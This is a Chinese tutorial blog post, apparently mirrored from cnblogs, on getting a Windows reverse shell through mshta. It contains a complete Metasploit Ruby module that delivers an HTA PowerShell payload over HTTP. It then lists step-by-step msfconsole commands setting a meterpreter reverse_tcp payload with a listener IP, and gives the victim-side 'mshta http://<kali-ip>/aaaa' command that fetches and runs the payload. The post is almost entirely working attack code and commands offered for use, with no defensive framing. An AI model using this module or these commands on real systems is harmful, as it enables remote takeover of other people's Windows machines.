zoukankan      html  css  js  c++  java
  • mshta 反弹shell

      kali系统准备:

      复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦):

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
      
      
    class MetasploitModule  < Msf::Exploit::Remote
      Rank = NormalRanking
      
      include Msf::Exploit::Remote::HttpServer
      
      def initialize(info  = {})
        super(update_info(info,
          'Name' => 'Microsoft Office Payload Delivery',
          'Description' => %q{
            This module generates an command to place within
            a word document, that when executed, will retrieve a HTA payload
            via HTTP from an web server. Currently have not figured out how
            to generate a doc.
          },
          'License' => MSF_LICENSE,
          'Arch' => ARCH_X86,
          'Platform' => 'win',
          'Targets' =>
            [
              ['Automatic', {} ],
            ],
          'DefaultTarget' => 0,
        ))
      end
      
      def on_request_uri(cli, _request)
        print_status("Delivering payload")
        p = regenerate_payload(cli)
        data = Msf::Util::EXE.to_executable_fmt(
          framework,
          ARCH_X86,
          'win',
          p.encoded,
          'hta-psh',
          { :arch => ARCH_X86, :platform => 'win '}
        )
        send_response(cli, data, 'Content-Type' => 'application/hta')
      end
      
      
      def primer
        url = get_uri
        print_status("Place the following DDE in an MS document:")
        print_line("mshta.exe "#{url}"")
      end
    end
    

      在命令行启动msf的服务:

    service postgresql start

      再启动msf:

    sudo msfconsole

      重新加载所有模块:

    reload_all

      查找我们刚刚新建的msh_shell模块:

    search msh_shell

      加载这个模块:

    use exploit/windows/smb/msh_shell

      使用反弹shellcode, 配置本机地址,  配置uri地址

    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.105
    set uripath aaaa
    exploit

      window系统:

      打开运行命令,执行:

    mshta http://kali系统的IP/aaaa

      kali系统就会收到一个window系统的shell

  • 相关阅读:
    SQL 从查询结果里查询
    c++函数返回局部变量
    《Android源代码设计模式解析与实战》读书笔记(二十)
    也谈学习
    Ejb in action(一)——开篇介绍
    Re-ID with Triplet Loss
    AFNetworking、ASIHTTPRequest中SSL的使用
    BZOJ 1982: [Spoj 2021]Moving Pebbles [博弈论 对称]
    BZOJ 3895: 取石子[SG函数 搜索]
    BZOJ 2463: [中山市选2009]谁能赢呢?[智慧]
  • 原文地址:https://www.cnblogs.com/diligenceday/p/7906878.html
Copyright © 2011-2022 走看看